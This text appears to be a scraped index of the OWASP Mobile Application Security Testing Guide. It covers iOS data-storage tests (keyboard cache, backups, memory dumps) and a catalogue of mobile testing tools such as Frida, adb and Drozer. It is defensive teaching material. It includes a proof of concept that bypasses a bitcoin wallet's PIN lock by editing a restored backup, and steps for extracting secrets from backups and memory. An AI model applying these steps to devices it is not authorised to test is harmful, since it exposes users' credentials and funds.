"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/","title":"Determining Whether Sensitive Data Is Shared with Third Parties","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#overview","title":"Overview","text":"Sensitive information might be leaked to third parties by several means. On iOS typically via third-party services embedded in the app.
The features these services provide can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
To determine whether API calls and functions provided by the third-party library are used according to best practices, review their source code, requested permissions and check for any known vulnerabilities.
All data that's sent to third-party services should be anonymized to prevent exposure of PII (Personal Identifiable Information) that would allow the third party to identify the user account. No other data (such as IDs that can be mapped to a user account or session) should be sent to a third party.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054/#dynamic-analysis","title":"Dynamic Analysis","text":"Check all requests to external services for embedded sensitive information. To intercept traffic between the client and server, you can perform dynamic analysis by launching a man-in-the-middle (MITM) attack with Burp Suite Professional or OWASP ZAP. Once you route the traffic through the interception proxy, you can try to sniff the traffic that passes between the app and server. All app requests that aren't sent directly to the server on which the main function is hosted should be checked for sensitive information, such as PII in a tracker or ad service.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/","title":"Finding Sensitive Data in the Keyboard Cache","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#static-analysis","title":"Static Analysis","text":" textObject.autocorrectionType = UITextAutocorrectionTypeNo;\n textObject.secureTextEntry = YES;\n
Interface Builder
of Xcode and verify the states of Secure Text Entry
and Correction
in the Attributes Inspector
for the appropriate object.The application must prevent the caching of sensitive information entered into text fields. You can prevent caching by disabling it programmatically, using the textObject.autocorrectionType = UITextAutocorrectionTypeNo
directive in the desired UITextFields, UITextViews, and UISearchBars. For data that should be masked, such as PINs and passwords, set textObject.secureTextEntry
to YES
.
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0055/#dynamic-analysis","title":"Dynamic Analysis","text":"If a jailbroken iPhone is available, execute the following steps:
Settings > General > Reset > Reset Keyboard Dictionary
..dat
in the following directory and its subdirectories. (which might be different for iOS versions before 8.0): /private/var/mobile/Library/Keyboard/
UITextField *textField = [ [ UITextField alloc ] initWithFrame: frame ];\ntextField.autocorrectionType = UITextAutocorrectionTypeNo;\n
If you must use a non-jailbroken iPhone:
A backup of a device on which a mobile application has been installed will include all subdirectories (except for Library/Caches/
) and files in the app's private directory.
Therefore, avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories.
Although all the files in Documents/
and Library/Application Support/
are always backed up by default, you can exclude files from the backup by calling NSURL setResourceValue:forKey:error:
with the NSURLIsExcludedFromBackupKey
key.
You can use the NSURLIsExcludedFromBackupKey and CFURLIsExcludedFromBackupKey file system properties to exclude files and directories from backups. An app that needs to exclude many files can do so by creating its own subdirectory and marking that directory excluded. Apps should create their own directories for exclusion instead of excluding system-defined directories.
Both file system properties are preferable to the deprecated approach of directly setting an extended attribute. All apps running on iOS version 5.1 and later should use these properties to exclude data from backups.
The following is sample Objective-C code for excluding a file from a backup on iOS 5.1 and later:
- (BOOL)addSkipBackupAttributeToItemAtPath:(NSString *) filePathString\n{\n NSURL* URL= [NSURL fileURLWithPath: filePathString];\n assert([[NSFileManager defaultManager] fileExistsAtPath: [URL path]]);\n\n NSError *error = nil;\n BOOL success = [URL setResourceValue: [NSNumber numberWithBool: YES]\n forKey: NSURLIsExcludedFromBackupKey error: &error];\n if(!success){\n NSLog(@\"Error excluding %@ from backup %@\", [URL lastPathComponent], error);\n }\n return success;\n}\n
The following is sample Swift code for excluding a file from a backup on iOS 5.1 and later, see Swift excluding files from iCloud backup for more information:
enum ExcludeFileError: Error {\n case fileDoesNotExist\n case error(String)\n}\n\nfunc excludeFileFromBackup(filePath: URL) -> Result<Bool, ExcludeFileError> {\n var file = filePath\n\n do {\n if FileManager.default.fileExists(atPath: file.path) {\n var res = URLResourceValues()\n res.isExcludedFromBackup = true\n try file.setResourceValues(res)\n return .success(true)\n\n } else {\n return .failure(.fileDoesNotExist)\n }\n } catch {\n return .failure(.error(\"Error excluding \\(file.lastPathComponent) from backup \\(error)\"))\n }\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#dynamic-analysis","title":"Dynamic Analysis","text":"In order to test the backup, you obviously need to create one first. The most common way to create a backup of an iOS device is by using iTunes, which is available for Windows, Linux and of course macOS (till macOS Mojave). When creating a backup via iTunes you can always only backup the whole device and not select just a single app. Make sure that the option \"Encrypt local backup\" in iTunes is not set, so that the backup is stored in cleartext on your hard drive.
iTunes is not available anymore from macOS Catalina onwards. Managing of an iOS device, including updates, backup and restore has been moved to the Finder app. The approach remains the same, as described above.
After the iOS device has been backed up, you need to retrieve the file path of the backup, which are different locations on each OS. The official Apple documentation will help you to locate backups of your iPhone, iPad, and iPod touch.
When you want to navigate to the backup folder up to High Sierra you can easily do so. Starting with macOS Mojave you will get the following error (even as root):
$ pwd\n/Users/foo/Library/Application Support\n$ ls -alh MobileSync\nls: MobileSync: Operation not permitted\n
This is not a permission issue of the backup folder, but a new feature in macOS Mojave. You can solve this problem by granting full disk access to your terminal application by following the explanation on OSXDaily.
Before you can access the directory you need to select the folder with the UDID of your device. Check the section \"Getting the UDID of an iOS device\" in the \"iOS Basic Security Testing\" chapter on how to retrieve the UDID.
Once you know the UDID you can navigate into this directory and you will find the full backup of the whole device, which does include pictures, app data and whatever might have been stored on the device.
Review the data that's in the backed up files and folders. The structure of the directories and file names is obfuscated and will look like this:
$ pwd\n/Users/foo/Library/Application Support/MobileSync/Backup/416f01bd160932d2bf2f95f1f142bc29b1c62dcb/00\n$ ls | head -n 3\n000127b08898088a8a169b4f63b363a3adcf389b\n0001fe89d0d03708d414b36bc6f706f567b08d66\n000200a644d7d2c56eec5b89c1921dacbec83c3e\n
Therefore, it's not straightforward to navigate through it and you will not find any hints of the app you want to analyze in the directory or file name. You can consider using the iMazing shareware utility to assist here. Perform a device backup with iMazing and use its built-in backup explorer to easily analyze app container contents including original paths and file names.
Without iMazing or similar software you may need to resort to using grep to identify sensitive data. This is not the most thorough approach but you can try searching for sensitive data that you have keyed in while using the app before you made the backup. For example: the username, password, credit card data, PII or any data that is considered sensitive in the context of the app.
~/Library/Application Support/MobileSync/Backup/<UDID>\ngrep -iRn \"password\" .\n
As described in the Static Analysis section, any sensitive data that you're able to find should be excluded from the backup, encrypted properly by using the Keychain or not stored on the device in the first place.
To identify if a backup is encrypted, you can check the key named \"IsEncrypted\" from the file \"Manifest.plist\", located at the root of the backup directory. The following example shows a configuration indicating that the backup is encrypted:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n...\n <key>Date</key>\n <date>2021-03-12T17:43:33Z</date>\n <key>IsEncrypted</key>\n <true/>\n...\n</plist>\n
In case you need to work with an encrypted backup, there are some Python scripts in DinoSec's GitHub repo, such as backup_tool.py and backup_passwd.py, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool iOSbackup to easily read and extract files from a password-encrypted iOS backup.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0058/#proof-of-concept-removing-ui-lock-with-tampered-backup","title":"Proof of Concept: Removing UI Lock with Tampered Backup","text":"As discussed earlier, sensitive data is not limited to just user data and PII. It can also be configuration or settings files that affect app behavior, restrict functionality, or enable security controls. If you take a look at the open source bitcoin wallet app, Bither, you'll see that it's possible to configure a PIN to lock the UI. And after a few easy steps, you will see how to bypass this UI lock with a modified backup on a non-jailbroken device.
After you enable the pin, use iMazing to perform a device backup:
Next you can open the backup to view app container files within your target app:
At this point you can view all the backed up content for Bither.
This is where you can begin parsing through the files looking for sensitive data. In the screenshot you'll see the net.bither.plist
file which contains the pin_code
attribute. To remove the UI lock restriction, simply delete the pin_code
attribute and save the changes.
From there it's possible to easily restore the modified version of net.bither.plist
back onto the device using the licensed version of iMazing.
The free workaround, however, is to find the plist file in the obfuscated backup generated by iTunes/Finder. So create your backup of the device with Bither's PIN code configured. Then, using the steps described earlier, find the backup directory and grep for \"pin_code\" as shown below.
$ ~/Library/Application Support/MobileSync/Backup/<UDID>\n$ grep -iRn \"pin_code\" .\nBinary file ./13/135416dd5f251f9251e0f07206277586b7eac6f6 matches\n
You'll see there was a match on a binary file with an obfuscated name. This is your net.bither.plist
file. Go ahead and rename the file giving it a plist extension so Xcode can easily open it up for you.
Again, remove the pin_code
attribute from the plist and save your changes. Rename the file back to the original name (i.e., without the plist extension) and perform your backup restore. When the restore is complete you'll see that Bither no longer prompts you for the PIN code when launched.
When performing static analysis for sensitive data exposed via memory, you should
String
and NSString
,There are several approaches and tools available for dynamically testing the memory of an iOS app for sensitive data.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a jailbroken or a non-jailbroken device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on iOS\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -ZZ memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0060/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"By using r2frida you can analyze and inspect the app's memory while running and without needing to dump it. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on iOS\".
"},{"location":"MASTG/tools/","title":"Testing Tools","text":"The OWASP MASTG includes many tools to assist you in executing test cases, allowing you to perform static analysis, dynamic analysis, dynamic instrumentation, etc. These tools are meant to help you conduct your own assessments, rather than provide a conclusive result on an application's security status. It's essential to carefully review the tools' output, as it can contain both false positives and false negatives.
The goal of the MASTG is to be as accessible as possible. For this reason, we prioritize including tools that meet the following criteria:
In instances where no suitable open-source alternative exists, we may include closed-source tools. However, any closed-source tools included must be free to use, as we aim to avoid featuring paid tools whenever possible. This also extends to freeware or community editions of commercial tools.
Our goal is to be vendor-neutral and to serve as a trusted learning resource, so the specific category of \"automated mobile application security scanners\" presents a unique challenge. For this reason, we have historically avoided including such tools due to the competitive disadvantages they can create among vendors. In contrast, we prioritize tools like MobSF that provide full access to their code and a comprehensive set of tests, making them excellent for educational purposes. Tools that lack this level of transparency, even if they offer a free version, generally do not meet the inclusion criteria of the OWASP MAS project.
Disclaimer: Each tool included in the MASTG examples was verified to be functional at the time it was added. However, the tools may not work properly depending on the OS version of both your host computer and your test device. The functionality of the tools can also be affected by whether you're using a rooted or jailbroken device, the specific version of the rooting or jailbreaking method, and/or the tool version itself. The OWASP MASTG does not assume any responsibility for the operational status of these tools. If you encounter a broken tool or example, we recommend searching online for a solution or contacting the tool's provider directly. If the tool has a GitHub page, you may also open an issue there.
"},{"location":"MASTG/tools/#generic-tools","title":"Generic Tools","text":"ID Name Platform MASTG-TOOL-0037 RMS Runtime Mobile Security generic MASTG-TOOL-0031 Frida generic MASTG-TOOL-0035 MobSF generic MASTG-TOOL-0032 Frida CodeShare generic MASTG-TOOL-0033 Ghidra generic MASTG-TOOL-0036 r2frida generic MASTG-TOOL-0038 objection generic MASTG-TOOL-0034 LIEF generic MASTG-TOOL-0098 iaito generic"},{"location":"MASTG/tools/#android-tools","title":"Android Tools","text":"ID Name Platform MASTG-TOOL-0023 RootCloak Plus android MASTG-TOOL-0015 Drozer android MASTG-TOOL-0003 nm - Android android MASTG-TOOL-0004 adb android MASTG-TOOL-0009 APKiD android MASTG-TOOL-0024 Scrcpy android MASTG-TOOL-0029 objection for Android android MASTG-TOOL-0006 Android SDK android MASTG-TOOL-0025 SSLUnpinning android MASTG-TOOL-0018 jadx android MASTG-TOOL-0007 Android Studio android MASTG-TOOL-0019 jdb android MASTG-TOOL-0099 FlowDroid android MASTG-TOOL-0028 radare2 for Android android MASTG-TOOL-0001 Frida for Android android MASTG-TOOL-0014 Bytecode Viewer android MASTG-TOOL-0008 Android-SSL-TrustKiller android MASTG-TOOL-0021 Magisk android MASTG-TOOL-0010 APKLab android MASTG-TOOL-0011 Apktool android MASTG-TOOL-0017 House android MASTG-TOOL-0026 Termux android MASTG-TOOL-0002 MobSF for Android android MASTG-TOOL-0030 Angr android MASTG-TOOL-0027 Xposed android MASTG-TOOL-0013 Busybox android MASTG-TOOL-0016 gplaycli android MASTG-TOOL-0022 Proguard android MASTG-TOOL-0020 JustTrustMe android MASTG-TOOL-0012 apkx android MASTG-TOOL-0005 Android NDK android"},{"location":"MASTG/tools/#ios-tools","title":"Ios Tools","text":"ID Name Platform MASTG-TOOL-0053 iOSbackup ios MASTG-TOOL-0040 MobSF for iOS ios MASTG-TOOL-0074 objection for iOS ios MASTG-TOOL-0072 xcrun ios MASTG-TOOL-0069 Usbmuxd ios MASTG-TOOL-0057 lldb ios MASTG-TOOL-0071 Xcode Command Line Tools ios MASTG-TOOL-0066 SSL Kill Switch 3 ios MASTG-TOOL-0051 gdb ios MASTG-TOOL-0050 Frida-ios-dump ios MASTG-TOOL-0060 otool ios MASTG-TOOL-0041 nm - iOS ios MASTG-TOOL-0046 Cycript ios MASTG-TOOL-0065 simctl ios MASTG-TOOL-0068 SwiftShield ios MASTG-TOOL-0039 Frida for iOS ios MASTG-TOOL-0044 class-dump-z ios MASTG-TOOL-0055 iProxy ios MASTG-TOOL-0048 dsdump ios MASTG-TOOL-0059 optool ios MASTG-TOOL-0056 Keychain-Dumper ios MASTG-TOOL-0042 BinaryCookieReader ios MASTG-TOOL-0047 Cydia ios MASTG-TOOL-0101 codesign ios MASTG-TOOL-0062 Plutil ios MASTG-TOOL-0073 radare2 for iOS ios MASTG-TOOL-0049 Frida-cycript ios MASTG-TOOL-0061 Grapefruit ios MASTG-TOOL-0064 Sileo ios MASTG-TOOL-0067 swift-demangle ios MASTG-TOOL-0045 class-dump-dyld ios MASTG-TOOL-0058 MachoOView ios MASTG-TOOL-0063 security ios MASTG-TOOL-0054 ios-deploy ios MASTG-TOOL-0070 Xcode ios MASTG-TOOL-0043 class-dump ios"},{"location":"MASTG/tools/#network-tools","title":"Network Tools","text":"ID Name Platform MASTG-TOOL-0075 Android tcpdump network MASTG-TOOL-0078 MITM Relay network MASTG-TOOL-0076 bettercap network MASTG-TOOL-0097 mitmproxy network MASTG-TOOL-0081 Wireshark network MASTG-TOOL-0079 OWASP ZAP network MASTG-TOOL-0080 tcpdump network MASTG-TOOL-0077 Burp Suite network"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/","title":"Frida for Android","text":"Frida supports interaction with the Android Java runtime though the Java API. You'll be able to hook and call both Java and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on Android:
Remember that on Android, you can also benefit from the built-in tools provided when installing Frida, that includes the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name some of them.
Frida is often compared to Xposed, however this comparison is far from fair as both frameworks were designed with different goals in mind. This is important to understand as an app security tester so that you can know which framework to use in which situation:
Note that Xposed, as of early 2019, does not work on Android 9 (API level 28) yet.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#installing-frida-on-android","title":"Installing Frida on Android","text":"In order to set up Frida on your Android device:
We assume a rooted device here unless otherwise noted. Download the frida-server binary from the Frida releases page. Make sure that you download the right frida-server binary for the architecture of your Android device or emulator: x86, x86_64, arm or arm64. Make sure that the server version (at least the major version number) matches the version of your local Frida installation. PyPI usually installs the latest version of Frida. If you're unsure which version is installed, you can check with the Frida command line tool:
frida --version\n
Or you can run the following command to automatically detect Frida version and download the right frida-server binary:
wget https://github.com/frida/frida/releases/download/$(frida --version)/frida-server-$(frida --version)-android-arm.xz\n
Copy frida-server to the device and run it:
adb push frida-server /data/local/tmp/\nadb shell \"chmod 755 /data/local/tmp/frida-server\"\nadb shell \"su -c /data/local/tmp/frida-server &\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#using-frida-on-android","title":"Using Frida on Android","text":"With frida-server running, you should now be able to get a list of running processes with the following command (use the -U
option to indicate Frida to use a connected USB devices or emulator):
$ frida-ps -U\n PID Name\n----- --------------------------------------------------------------\n 276 adbd\n 956 android.process.media\n 198 bridgemgrd\n30692 com.android.chrome\n30774 com.android.chrome:privileged_process0\n30747 com.android.chrome:sandboxed\n30834 com.android.chrome:sandboxed\n 3059 com.android.nfc\n 1526 com.android.phone\n17104 com.android.settings\n 1302 com.android.systemui\n(...)\n
Or restrict the list with the -Uai
flag combination to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n----- ---------------------------------------- ------------------------------\n 766 Android System android\n30692 Chrome com.android.chrome\n 3520 Contacts Storage com.android.providers.contacts\n - Uncrackable1 sg.vantagepoint.uncrackable1\n - drozer Agent com.mwr.dz\n
This will show the names and identifiers of all apps, if they are currently running it will also show their PIDs. Search for your app in the list and take a note of the PID or its name/identifier. From now on you'll refer to your app by using one of them. A recommendation is to use the identifiers, as the PIDs will change on each run of the app. For example let's take com.android.chrome
. You can use this string now on all Frida tools, e.g. on the Frida CLI, on frida-trace or from a Python script.
To trace specific (low-level) library calls, you can use the frida-trace
command line tool:
frida-trace -U com.android.chrome -i \"open\"\n
This generates a little JavaScript in __handlers__/libc.so/open.js
, which Frida injects into the process. The script traces all calls to the open
function in libc.so
. You can modify the generated script according to your needs with Frida JavaScript API.
Unfortunately tracing high-level methods of Java classes is not yet supported (but might be in the future).
"},{"location":"MASTG/tools/android/MASTG-TOOL-0001/#frida-cli-and-the-java-api","title":"Frida CLI and the Java API","text":"Use the Frida CLI tool (frida
) to work with Frida interactively. It hooks into a process and gives you a command line interface to Frida's API.
frida -U com.android.chrome\n
With the -l
option, you can also use the Frida CLI to load scripts , e.g., to load myscript.js
:
frida -U -l myscript.js com.android.chrome\n
Frida also provides a Java API, which is especially helpful for dealing with Android apps. It lets you work with Java classes and objects directly. Here is a script to overwrite the onResume
function of an Activity class:
Java.perform(function () {\n var Activity = Java.use(\"android.app.Activity\");\n Activity.onResume.implementation = function () {\n console.log(\"[*] onResume() got called!\");\n this.onResume();\n };\n});\n
The above script calls Java.perform
to make sure that your code gets executed in the context of the Java VM. It instantiates a wrapper for the android.app.Activity
class via Java.use
and overwrites the onResume
function. The new onResume
function implementation prints a notice to the console and calls the original onResume
method by invoking this.onResume
every time an activity is resumed in the app.
The JADX decompiler (v1.3.3 and above) can generate Frida snippets through its graphical code browser. To use this feature, open the APK or DEX with jadx-gui
, browse to the target method, right click the method name, and select \"Copy as frida snippet (f)\". For example using the MASTG UnCrackable App for Android Level 1:
The above steps place the following output in the pasteboard, which you can then paste in a JavaScript file and feed into frida -U -l
.
let a = Java.use(\"sg.vantagepoint.a.a\");\na[\"a\"].implementation = function (bArr, bArr2) {\n console.log('a is called' + ', ' + 'bArr: ' + bArr + ', ' + 'bArr2: ' + bArr2);\n let ret = this.a(bArr, bArr2);\n console.log('a ret value is ' + ret);\n return ret;\n};\n
The above code hooks the a
method within the sg.vantagepoint.a.a
class and logs its input parameters and return values.
Frida also lets you search for and work with instantiated objects that are on the heap. The following script searches for instances of android.view.View
objects and calls their toString
method. The result is printed to the console:
setImmediate(function() {\n console.log(\"[*] Starting script\");\n Java.perform(function () {\n Java.choose(\"android.view.View\", {\n \"onMatch\":function(instance){\n console.log(\"[*] Instance found: \" + instance.toString());\n },\n \"onComplete\":function() {\n console.log(\"[*] Finished heap search\")\n }\n });\n });\n});\n
The output would look like this:
[*] Starting script\n[*] Instance found: android.view.View{7ccea78 G.ED..... ......ID 0,0-0,0 #7f0c01fc app:id/action_bar_black_background}\n[*] Instance found: android.view.View{2809551 V.ED..... ........ 0,1731-0,1731 #7f0c01ff app:id/menu_anchor_stub}\n[*] Instance found: android.view.View{be471b6 G.ED..... ......I. 0,0-0,0 #7f0c01f5 app:id/location_bar_verbose_status_separator}\n[*] Instance found: android.view.View{3ae0eb7 V.ED..... ........ 0,0-1080,63 #102002f android:id/statusBarBackground}\n[*] Finished heap search\n
You can also use Java's reflection capabilities. To list the public methods of the android.view.View
class, you could create a wrapper for this class in Frida and call getMethods
from the wrapper's class
property:
Java.perform(function () {\n var view = Java.use(\"android.view.View\");\n var methods = view.class.getMethods();\n for(var i = 0; i < methods.length; i++) {\n console.log(methods[i].toString());\n }\n});\n
This will print a very long list of methods to the terminal:
public boolean android.view.View.canResolveLayoutDirection()\npublic boolean android.view.View.canResolveTextAlignment()\npublic boolean android.view.View.canResolveTextDirection()\npublic boolean android.view.View.canScrollHorizontally(int)\npublic boolean android.view.View.canScrollVertically(int)\npublic final void android.view.View.cancelDragAndDrop()\npublic void android.view.View.cancelLongPress()\npublic final void android.view.View.cancelPendingInputEvents()\n...\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0002/","title":"MobSF for Android","text":"After MobSF is done with its analysis, you will receive a one-page overview of all the tests that were executed. The page is split up into multiple sections giving some first hints on the attack surface of the application.
The following is displayed:
AndroidManifest.xml
file.Refer to MobSF documentation for more details.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0003/","title":"nm - Android","text":"nm is a tool that displays the name list (symbol table) of the given binary. You can find here more information for the Android (GNU) version.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0004/","title":"adb","text":"adb (Android Debug Bridge), shipped with the Android SDK, bridges the gap between your local development environment and a connected Android device. You'll usually leverage it to test apps on the emulator or a connected device via USB or Wi-Fi. Use the adb devices
command to list the connected devices and execute it with the -l
argument to retrieve more details on them.
$ adb devices -l\nList of devices attached\n090c285c0b97f748 device usb:1-1 product:razor model:Nexus_7 device:flo\nemulator-5554 device product:sdk_google_phone_x86 model:Android_SDK_built_for_x86 device:generic_x86 transport_id:1\n
adb provides other useful commands such as adb shell
to start an interactive shell on a target and adb forward
to forward traffic on a specific host port to a different port on a connect device.
adb forward tcp:<host port> tcp:<device port>\n
$ adb -s emulator-5554 shell\nroot@generic_x86:/ # ls\nacct\ncache\ncharger\nconfig\n...\n
You'll come across different use cases on how you can use adb commands when testing later in this book. Note that you must define the serialnummer of the target device with the -s
argument (as shown by the previous code snippet) in case you have multiple devices connected.
The Android NDK contains prebuilt versions of the native compiler and toolchain. Both the GCC and Clang compilers have traditionally been supported, but active support for GCC ended with NDK revision 14. The device architecture and host OS determine the appropriate version. The prebuilt toolchains are in the toolchains
directory of the NDK, which contains one subdirectory for each architecture.
Besides picking the right architecture, you need to specify the correct sysroot for the native API level you want to target. The sysroot is a directory that contains the system headers and libraries for your target. Native APIs vary by Android API level. Available sysroot directories for each Android API level can be found in $NDK/platforms/
. Each API level directory contains subdirectories for the various CPUs and architectures.
One possibility for setting up the build system is exporting the compiler path and necessary flags as environment variables. To make things easier, however, the NDK allows you to create a so-called standalone toolchain, which is a temporary toolchain that incorporates the required settings.
To set up a standalone toolchain, download the latest stable version of the NDK. Extract the ZIP file, change into the NDK root directory, and run the following command:
./build/tools/make_standalone_toolchain.py --arch arm --api 24 --install-dir /tmp/android-7-toolchain\n
This creates a standalone toolchain for Android 7.0 (API level 24) in the directory /tmp/android-7-toolchain
. For convenience, you can export an environment variable that points to your toolchain directory, (we'll be using this in the examples). Run the following command or add it to your .bash_profile
or other startup script:
export TOOLCHAIN=/tmp/android-7-toolchain\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0006/","title":"Android SDK","text":"Local Android SDK installations are managed via Android Studio. Create an empty project in Android Studio and select Tools -> SDK Manager to open the SDK Manager GUI. The SDK Platforms tab is where you install SDKs for multiple API levels. Recent API levels are:
An overview of all Android codenames, their version number and API levels can be found in the Android Developer Documentation.
Installed SDKs are on the following paths:
Windows:
C:\\Users\\<username>\\AppData\\Local\\Android\\sdk\n
MacOS:
/Users/<username>/Library/Android/sdk\n
Note: On Linux, you need to choose an SDK directory. /opt
, /srv
, and /usr/local
are common choices.
The official IDE for Google's Android operating system, built on JetBrains' IntelliJ IDEA software and designed specifically for Android development - https://developer.android.com/studio/index.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0008/","title":"Android-SSL-TrustKiller","text":"Android-SSL-TrustKiller is a Cydia Substrate Module acting as a blackbox tool to bypass SSL certificate pinning for most applications running on a device - https://github.com/iSECPartners/Android-SSL-TrustKiller
"},{"location":"MASTG/tools/android/MASTG-TOOL-0009/","title":"APKiD","text":"APKiD gives you information about how an APK was made. It identifies many compilers, packers, obfuscators, and other weird stuff.
For more information on what this tool can be used for, check out:
APKLab is a convenient Visual Studio Code extension leveraging tools such as apktool and jadx to enable features including app unpacking, decompilation, code patching (e.g. for MITM), and repackaging straight from the IDE.
For more information, you can refer to APKLab's official documentation.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0011/","title":"Apktool","text":"Apktool is used to unpack Android app packages (APKs). Simply unzipping APKs with the standard unzip
utility leaves some files unreadable. AndroidManifest.xml
is encoded into binary XML format which isn\u2019t readable with a text editor. Also, the app resources are still packaged into a single archive file.
When run with default command line flags, apktool automatically decodes the Android Manifest file to text-based XML format and extracts the file resources (it also disassembles the .DEX files to smali code - a feature that we\u2019ll revisit later in this book).
Among the unpacked files you can usually find (after running apktool d base.apk
):
You can also use apktool to repackage decoded resources back to binary APK/JAR. See the section \"Exploring the App Package\" later on this chapter and section \"Repackaging\" in the chapter Tampering and Reverse Engineering on Android for more information and practical examples.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0012/","title":"apkx","text":"apkx is a Python wrapper to popular free DEX converters and Java decompilers. It automates the extraction, conversion, and decompilation of APKs. Install it as follows:
git clone https://github.com/muellerberndt/apkx\ncd apkx\nsudo ./install.sh\n
This should copy apkx to /usr/local/bin
. See section \"Decompiling Java Code\" of the \"Reverse Engineering and Tampering\" chapter for more information about usage.
Busybox combines multiple common Unix utilities into a small single executable. The utilities included generally have fewer options than their full-featured GNU counterparts, but are sufficient enough to provide a complete environment on a small or embedded system. Busybox can be installed on a rooted device by downloading the Busybox application from Google Play Store. You can also download the binary directly from the Busybox website. Once downloaded, make an adb push busybox /data/local/tmp
to have the executable available on your phone. A quick overview of how to install and use Busybox can be found in the Busybox FAQ.
Bytecode Viewer (BCV) is a free and open source Java decompiler framework running on all operating systems. It is a versatile tool which can be used to decompile Android apps, view APK resources (via apktool) and easily edit APKs (via Smali/Baksmali). Apart from APKs, also DEX, Java Class files and Java Jars can be viewed. One of its major features is the support for multiple Java bytecode decompilers under one GUI. BCV currently includes the Procyon, CFR, Fernflower, Krakatau, and JADX-Core decompilers. These decompilers have different strengths and can be easily leveraged while using BCV, especially when dealing with obfuscated programs.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/","title":"Drozer","text":"Drozer is an Android security assessment framework that allows you to search for security vulnerabilities in apps and devices by assuming the role of a third-party app interacting with the other application's IPC endpoints and the underlying OS.
The advantage of using drozer consists on its ability to automate several tasks and that it can be expanded through modules. The modules are very helpful and they cover different categories including a scanner category that allows you to scan for known defects with a simple command such as the module scanner.provider.injection
which detects SQL injections in content providers in all the apps installed in the system. Without drozer, simple tasks such as listing the app's permissions require several steps that include decompiling the APK and manually analyzing the results.
You can refer to drozer GitHub page (for Linux and Windows, for macOS please refer to this blog post) and the drozer website for prerequisites and installation instructions.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#using-drozer","title":"Using Drozer","text":"Before you can start using drozer, you'll also need the drozer agent that runs on the Android device itself. Download the latest drozer agent from the GitHub releases page and install it with adb install drozer.apk
.
Once the setup is completed you can start a session to an emulator or a device connected per USB by running adb forward tcp:31415 tcp:31415
and drozer console connect
. This is called direct mode and you can see the full instructions in the User Guide in section \"Starting a Session\". An alternative is to run Drozer in infrastructure mode, where, you are running a drozer server that can handle multiple consoles and agents, and routes sessions between them. You can find the details of how to setup drozer in this mode in the \"Infrastructure Mode\" section of the User Guide.
Now you are ready to begin analyzing apps. A good first step is to enumerate the attack surface of an app which can be done easily with the following command:
dz> run app.package.attacksurface <package>\n
